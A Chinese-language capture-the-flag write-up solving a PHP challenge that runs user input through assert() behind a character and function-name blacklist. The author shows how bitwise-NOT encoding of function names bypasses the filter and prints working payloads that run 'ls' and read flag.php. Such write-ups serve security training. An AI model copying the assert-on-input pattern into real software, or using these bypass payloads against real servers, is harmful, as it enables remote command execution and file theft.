源代码

<?php
error_reporting(0);
if(!isset($_GET['code'])){
    highlight_file(__FILE__);
}else{
    $code = $_GET['code'];
    if (preg_match('/(f|l|a|g|\.|p|h|\/|;|\"|\'|\`|\||\[|\]|\_|=)/i',$code)) { 
        die('You are too good for me'); 
    }
    $blacklist = get_defined_functions()['internal'];
    foreach ($blacklist as $blackitem) { 
        if (preg_match ('/' . $blackitem . '/im', $code)) { 
            die('You deserve better'); 
        } 
    }
    assert($code);
}

解题步骤

审计代码可知,这道题把PHP内置函数都过滤了,还过滤了一些特殊符号
从PHP7开始可以用('phpinfo')();这种方式来执行函数
因为过滤了内置函数,所以需要绕过,中间的'phpinfo'可以通过取反来表示,如下
QQ截图20200624112014.png
也就是说phpinfo()可以写成(~%8F%97%8F%96%91%99%90)()
所以可以构造payload

?code=(~%8C%86%8C%8B%9A%92)(~%93%8C)

相当于system('ls'),发现flag.php,然后把ls换成cat flag.php即可得到flag
最终payload

?code=(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DF%99%93%9E%98%D1%8F%97%8F)
最后修改:2020 年 09 月 13 日 02 : 00 PM